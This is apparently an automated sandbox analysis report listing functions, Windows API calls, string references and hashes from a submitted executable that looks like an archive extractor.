Opcode ID: 8301df51a1e8f210b282f0071c765b5ce6a764c1caf73e8816893151ffb8c825
Instruction ID: 9bbf5903212f8539ba24e82fe04c52182b367d25787cefac10bff09ef8b3f4b8
Opcode Fuzzy Hash: 8301df51a1e8f210b282f0071c765b5ce6a764c1caf73e8816893151ffb8c825
Instruction Fuzzy Hash: 46A012D525D1067C300C25006D02C36418CC0C4B1633049DBF081C1140B4400D080032

Function 00BD9B00 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,00BD9D57,C:\Users\user\Desktop,00000000,00C085FA,00000006), ref: 00BD9B04

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: f6a9b8442a01436f2cfee76da2f3f9425aacb5705cee358d6f6c8a0e902586c7
Instruction ID: a368eac3e625079c972de6e4b31a40b53654d3c9f83538a61a09100668b09736
Opcode Fuzzy Hash: f6a9b8442a01436f2cfee76da2f3f9425aacb5705cee358d6f6c8a0e902586c7
Instruction Fuzzy Hash: 10A01230194006468A000B30CC09C2576515760702F0086207102C20A0CF318C20E504

Function 00BC9572 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,00BC9542), ref: 00BC958D

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: a09bc884d7e922cbdfb47ea9025b006b6cce9eb379734fba283fbf7c6b116df7
Instruction ID: b8b570f922e3a472d07e8801343cc10efb8f705043e246b1b004dddb0fc7cfd7
Opcode Fuzzy Hash: a09bc884d7e922cbdfb47ea9025b006b6cce9eb379734fba283fbf7c6b116df7
Instruction Fuzzy Hash: 7AF05EB0552B048EFB318B24C54DF92B7E49B26725F048B9ED0FA435D0D761684DCB50

Non-executed Functions

Function 00BDB014 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 289timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC12D7: GetDlgItem.USER32(00000000,00003021), ref: 00BC131B
Part of subcall function 00BC12D7: SetWindowTextW.USER32(00000000,00BF22E4), ref: 00BC1331

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00BDB0A5
EndDialog.USER32(?,00000006), ref: 00BDB0B8
GetDlgItem.USER32(?,0000006C), ref: 00BDB0D4
SetFocus.USER32(00000000), ref: 00BDB0DB
SetDlgItemTextW.USER32(?,00000065,?), ref: 00BDB11B
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00BDB14E
FindFirstFileW.KERNEL32(?,?), ref: 00BDB164
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BDB182
FileTimeToSystemTime.KERNEL32(?,?), ref: 00BDB192
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00BDB1AF
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00BDB1CD

Part of subcall function 00BCDA8B: LoadStringW.USER32(?,?,00000400,00000000), ref: 00BCDAD5
Part of subcall function 00BCDA8B: LoadStringW.USER32(?,?,00000400), ref: 00BCDAEB

_swprintf.LIBCMT ref: 00BDB1FD

Part of subcall function 00BC3F53: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BC3F66

SetDlgItemTextW.USER32(?,0000006A,?), ref: 00BDB210
FindClose.KERNEL32(00000000), ref: 00BDB213
_swprintf.LIBCMT ref: 00BDB26E
SetDlgItemTextW.USER32(?,00000068,?), ref: 00BDB281
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00BDB297
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00BDB2B7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00BDB2C7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00BDB2E1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00BDB2F9
_swprintf.LIBCMT ref: 00BDB32A
SetDlgItemTextW.USER32(?,0000006B,?), ref: 00BDB33D
_swprintf.LIBCMT ref: 00BDB38D
SetDlgItemTextW.USER32(?,00000069,?), ref: 00BDB3A0

Part of subcall function 00BD9E0C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00BD9E32
Part of subcall function 00BD9E0C: GetNumberFormatW.KERNEL32(00000400,00000000,?,00BFD600,?,?), ref: 00BD9E81

Strings

%s %s %s, xrefs: 00BDB1EB, 00BDB317
REPLACEFILEDLG, xrefs: 00BDB03B
%s %s, xrefs: 00BDB25C, 00BDB37F

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLoadLocalStringSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 3227067027-1840816070
Opcode ID: f6aec286df651b0dcff49a25fd3322e28e12974d963deee6b299e5636c49875e
Instruction ID: b27c7bddc16ebd283f1c938cc8e959dec2734c8f4957b6f9280cb1c3c0fc7a1a
Opcode Fuzzy Hash: f6aec286df651b0dcff49a25fd3322e28e12974d963deee6b299e5636c49875e
Instruction Fuzzy Hash: 51916072648348BBD221DBA0CC89FFBB7ECEB49700F05485AB749D7181EB71A605C762

Function 00BC70B9 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BC70BE
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 00BC721E
CloseHandle.KERNEL32(00000000), ref: 00BC722E

Part of subcall function 00BC7B08: GetCurrentProcess.KERNEL32(00000020,?), ref: 00BC7B17
Part of subcall function 00BC7B08: GetLastError.KERNEL32 ref: 00BC7B5D
Part of subcall function 00BC7B08: CloseHandle.KERNEL32(?), ref: 00BC7B6C

CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00BC7239
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00BC7347
DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00BC7373
CloseHandle.KERNEL32(?), ref: 00BC7385
GetLastError.KERNEL32 ref: 00BC7395
RemoveDirectoryW.KERNEL32(?), ref: 00BC73E1
DeleteFileW.KERNEL32(?), ref: 00BC7409

Strings

\??\, xrefs: 00BC7144
SeCreateSymbolicLinkPrivilege, xrefs: 00BC70E9
UNC\, xrefs: 00BC7169
SeRestorePrivilege, xrefs: 00BC70DF

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3935142422-3508440684
Opcode ID: bace7daf1f6858ca2dfa9b5f55b3b5e5e932327fe7c7d429eba58b1c7e4ef38e
Instruction ID: e3afc46c8b242e12df109244f35a25704cc39623b59408428481718ddb07b542
Opcode Fuzzy Hash: bace7daf1f6858ca2dfa9b5f55b3b5e5e932327fe7c7d429eba58b1c7e4ef38e
Instruction Fuzzy Hash: 60B18B719042589BEB21DF74CC85FEEB7E8EF48300F0445ADE959E7282DB34AA45CB60

Function 00BC320E Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 605COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BC3217
_memcmp.LIBVCRUNTIME ref: 00BC32FA

Strings

hc%u, xrefs: 00BC35FB
h%u, xrefs: 00BC35AD
CMT, xrefs: 00BC3910

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: H_prolog_memcmp
String ID: CMT$h%u$hc%u
API String ID: 3004599000-3282847064
Opcode ID: 689b0d817f993a6c515454c4cd4fef4d6b822bb62d1b603d7b5eab339da4090f
Instruction ID: 8917aa3a15ed28c61befb7ff93563ca99af3e9d640b59934ed27daeb2b8a404e
Opcode Fuzzy Hash: 689b0d817f993a6c515454c4cd4fef4d6b822bb62d1b603d7b5eab339da4090f
Instruction Fuzzy Hash: DE32A2715142849BDF18DF64C895FE93BE5EF54700F4884BEFD8A8B282DB709A49CB60

Function 00BEC5AE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00BEC6F4

Strings

1#SNAN, xrefs: 00BED8F3
1#QNAN, xrefs: 00BED8FA
1#IND, xrefs: 00BED8EC
1#INF, xrefs: 00BED901

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 5f571d19afca3c9e19b08396b5c866ef3318294dc179580f85395683ddc2c236
Instruction ID: 6d6c175832e0c888018ee5363456ff98d56b5920b82fddc86fc13738427d9ba7
Opcode Fuzzy Hash: 5f571d19afca3c9e19b08396b5c866ef3318294dc179580f85395683ddc2c236
Instruction Fuzzy Hash: 3BC23972E086688FDB25CE29DD807EAB7F5EB44305F1441EAD84EE7241E774AE818F41

Function 00BC277D Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 792COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BC2786
_strlen.LIBCMT ref: 00BC2D0A

Part of subcall function 00BD1006: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00BCB3AF,00000000,?,?,?,000103CC), ref: 00BD1022

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BC2E61

Strings

CMT, xrefs: 00BC2E94

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1706572503-2756464174
Opcode ID: 09f6f58e527a4effa189b153e82a41bfec594ecbd89c9eedb2714a27658f7ff6
Instruction ID: 7efbdfc9dce25a1f78491f56fbce708998c74b0257648ad573abf54119bb909e
Opcode Fuzzy Hash: 09f6f58e527a4effa189b153e82a41bfec594ecbd89c9eedb2714a27658f7ff6
Instruction Fuzzy Hash: 8462D4719002848FDF18DF68C895FEA3BE1EF64304F0845BEED9A9B286D7719945CB60

Function 00BE7C57 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00BE7D4F
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00BE7D59
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00BE7D66

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 78d0397e0d2ba694b74ebb145385d5c79dfeb3de5f0044a8138c70057d32b0e9
Instruction ID: 8def361fb5473ec51d21b3b65977ab2b03d2926cf6b84ab8d8ef5a92c09b9fff
Opcode Fuzzy Hash: 78d0397e0d2ba694b74ebb145385d5c79dfeb3de5f0044a8138c70057d32b0e9
Instruction Fuzzy Hash: CC31B374941218ABCB61EF68DC8979DBBF8EF08310F5045EAE41CA7250EB709B818F44

Function 00BEA02E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 00BEA1C1

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: c43e208b84d85fefaa9fd3b3483d73bdb905852427e99a21013122138937d2c5
Instruction ID: 93e1f0cfcf94df86d2aadc5ebc91f60fd898f35462abc11779af9b95fdfb4ca6
Opcode Fuzzy Hash: c43e208b84d85fefaa9fd3b3483d73bdb905852427e99a21013122138937d2c5
Instruction Fuzzy Hash: D3310671800189ABCB249E79CC85EFA7BFDDB46304F1041D8E41997292E770AD448B61

Function 00BEC100 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 018800a6249598ad81d90f5864df6e165ba524167c8a39889b5be4e4d8d1d074
Instruction ID: af6e0bf4bef4c49c2a3e0b175613e1bb0affa5500248ba794c56d9ec9b207191
Opcode Fuzzy Hash: 018800a6249598ad81d90f5864df6e165ba524167c8a39889b5be4e4d8d1d074
Instruction Fuzzy Hash: AD022D71E002199BDF14CFA9C8906ADBBF1EF48314F2581AAD919E7385D731AD42CB94

Function 00BD9E0C Relevance: 3.0, APIs: 2, Instructions: 46COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00BD9E32
GetNumberFormatW.KERNEL32(00000400,00000000,?,00BFD600,?,?), ref: 00BD9E81

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 7053be320310797bb9fc5debd6fe52a927eb37d4f576251c7803c137dcf1b621
Instruction ID: be9c06bddc14b128d8bfa65a905981160fdf45a60b9b39e2a76343145ddee3ad
Opcode Fuzzy Hash: 7053be320310797bb9fc5debd6fe52a927eb37d4f576251c7803c137dcf1b621
Instruction Fuzzy Hash: B0015E75500218BADB10CFA4DC45FAB7BBDEF09710F008462FB09E7250E7709924D7A5

Function 00BC6E20 Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00BD0E08,?,00000200), ref: 00BC6E20
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00BC6E41

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 622abb31e183b319e482f6d19410ac6673b04f8219a8560364e9a7ea46dee734
Instruction ID: 322a19fcb601c804794816a662ba25825ee7debd472fb9401dca3546f9d762d2
Opcode Fuzzy Hash: 622abb31e183b319e482f6d19410ac6673b04f8219a8560364e9a7ea46dee734
Instruction Fuzzy Hash: 5DD0C7353843027EFA114B74CC15F767795A755F41F1085457356DA0D4CD709014D719

Function 00BF06A4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00BF069F,?,?,00000008,?,?,00BF033F,00000000), ref: 00BF08D1

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: e910270a501ad10b4a53ab9d151460303f667bfbafddeedaf4e14ee72f8f1e92
Instruction ID: 297f821279512297d8138555a82285329f3257de1ff4253d090604695cc14903
Opcode Fuzzy Hash: e910270a501ad10b4a53ab9d151460303f667bfbafddeedaf4e14ee72f8f1e92
Instruction Fuzzy Hash: 3BB169316206089FD714DF2CC48AB647BE0FF44364F298698EA99CF2B2C375E995CB40

Function 00BC3FBD Relevance: 1.6, Strings: 1, Instructions: 332COMMON

Download Yara Rule

Strings

gj, xrefs: 00BC4000

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: b21c0fbb0fd2c51c87a41f70f92872a0766167bf8f0eb15fdf2e6e83075c0331
Instruction ID: ea520bd5c8bed693079a7f29bbd45890c8ed448eafaca22004810e061fd2a8ed
Opcode Fuzzy Hash: b21c0fbb0fd2c51c87a41f70f92872a0766167bf8f0eb15fdf2e6e83075c0331
Instruction Fuzzy Hash: 33F1E4B6A083418FC748CF29D880A2AFBE1BFC8208F15892EF598D7715D734E9458F56

Function 00BCAA39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00BCAA5E

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: ce46ba4220af8c71e29ac273da9ff340b56e3cfa1e736eb729fddef2c89586b6
Instruction ID: 013c557a5cad7726c3fe21d981ca8b31f8ed06b2433b00c50461f6433098796d
Opcode Fuzzy Hash: ce46ba4220af8c71e29ac273da9ff340b56e3cfa1e736eb729fddef2c89586b6
Instruction Fuzzy Hash: 38F01DB490021D8BCB18CB28EE81BF977A5F758318F214299EA1543750EB705D40DEA6

Function 00BDE643 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001E64F,00BDE0C4), ref: 00BDE648

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
